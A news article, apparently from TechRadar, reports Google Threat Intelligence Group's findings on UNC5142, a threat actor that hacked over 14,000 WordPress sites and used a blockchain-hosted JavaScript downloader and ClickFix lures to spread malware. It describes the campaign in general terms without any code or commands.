- UNC5142 hacked over 14,000 WordPress sites to distribute malware
- Malware payloads were mined from the blockchain, building resilience and preventing takedowns.
- ClickFix tricks deceived users into executing malicious commands
More than 14,000 WordPress websites have been hacked and used as launching pads for malware distribution, Google’s Threat Intelligence Group (GTIG) said in a recent report.
Discussing the campaign in depth, GTIG said it was the work of UNC5142, a relatively new threat actor that emerged in late 2023 and shut down operations in late July 2025.
It’s not yet clear if the hiatus is temporary, permanent, or if the group has simply opted for different techniques. Given its previous successes in compromising websites and deploying malware, Google believes the group has just improved its obfuscation techniques and is still operating in the wild.
Blockchain and ClickFix
As part of the campaign, UNC5142 would “indiscriminately” target vulnerable WordPress sites – those with plugins, theme files and, in some cases, the WordPress database itself.
These sites would receive a multi-step JavaScript downloader called CLEARSHOT, which would enable malware distribution. This downloader retrieved the payload from the second stage of the public blockchain, often using the BNB chain.
Using blockchain is attractive, the researchers found, because it improves resilience and makes withdrawals more difficult:
“The use of blockchain technology for much of UNC5142’s infrastructure and operation increases its resilience to detection and takedown efforts,” the report said.
“Network-based protection mechanisms are more difficult to implement for Web3 traffic than traditional web traffic due to the lack of use of traditional URLs. Input and withdrawal operations are also hampered given the immutability of blockchain.”
From the public blockchain, the malware would pull a CLEARSHORT landing page from an external server. This landing page would serve the ClickFix social engineering tactic – prompting users to copy and paste a command into the Run program on Windows (or the Terminal app on a Mac) that ultimately downloads the malware.
Landing pages were typically hosted on a Cloudflare .dev page, it was said, and retrieved in an encrypted format.
Via Hacker news
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
